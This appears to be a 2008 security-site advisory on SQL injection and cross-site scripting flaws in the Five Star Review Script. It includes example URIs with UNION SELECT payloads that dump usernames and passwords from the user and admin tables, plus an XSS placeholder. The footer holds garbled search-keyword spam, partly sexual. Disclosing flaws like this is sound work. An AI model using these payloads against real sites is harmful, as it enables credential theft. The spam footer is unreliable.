about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Five Star Review SQL Injection and Cross Site Scripting Vulnerabilities


Title Five Star Review SQL Injection and Cross Site Scripting Vulnerabilities
Published 2008-08-24-12:00AM
Updated 2008-08-24-12:00AM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Mr.SQL
Vulnerable  ReviewScript.com Five Star Review Script 0
Not Vulnerable  
Code  An attacker can exploit these issues via a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.The following example URIs are available:http://www.example.com/recommend.php?item_id=1'+union+select+0,concat_ws(0x3a,username,passtext),0,concat_ws(0x3a,username,passtext),0,0,0,0,0,0,0+from+review_users+limit+1,1/* http://www.example.com/recommend.php?item_id=1'+union+select+0,concat_ws(0x3a,username,passtext),0,concat_ws(0x3a,username,passtext),0,0,0,0,0,0,0+from+review_admin/* http://www.example.com/search/index.php?cmd=search&words= [[ XSS ]] &searchWhere=0&mode=normal
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sun, 23 Nov 2008 09:27:42 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
tami sex m global ann lo674l w`ww`sex`c videomateu arab.sex name of me sex vidiyo Www.workse ovo DOWNLOAD G ww.porn.co photoo IRIX b...ices.c joomla com tami sex m sex movia WWW.SEX.TV sxe 3.3 soft and j Free sex v six girl sex vidiyo tamil actr tamilactre www.meinvt ip board 2 blogbugs.o sex iran Cam2Cam Www.under1 nsxx 200 /compo dowenlod wwxnxx Mallikashe sex+video+ sex labia CMS is Fre bebo] six anemal mrbs Ash abhi s trisha bat news for c WWW.WORLDS oracel mambo Remo www.trish